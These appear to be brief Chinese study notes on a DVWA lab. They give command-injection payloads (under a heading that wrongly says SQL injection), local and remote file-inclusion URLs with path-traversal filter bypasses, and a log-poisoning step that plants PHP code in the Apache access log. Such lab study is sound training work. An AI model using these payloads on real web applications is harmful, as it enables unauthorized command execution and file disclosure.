SQL注入
low 127.0.0.1 | whoami
medium 127.0.0.1| whoami 由于源码中会过滤‘ |’,所以将空格去掉即可
文件包含
low
本地payload http://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../../123.txt
查看网页元素,找到cookies,在蚁剑中进行配置
远程payload http://192.168.1.168/dvwa/vulnerabilities/fi/?page=http://192.168.1.168/123.txt
medium
因为源码中会将../删除,所以将路径中的../改为....//即可
high
http://192.168.1.168/dvwa/vulnerabilities/fi/?page=file://C:\phpStudy\PHPTutorial\WWW\123.txt
因为源码中要求文件头为file,file:\\是用来寻找文件的命令
或
burp抓包传入一句话<?php phpinfo();?>
这样日志里记录的一句话就不会被url编码
http://192.168.1.120/dvwa/vulnerabilities/fi/?page=file:\\..\..\..\..\..\Apache\logs\access.log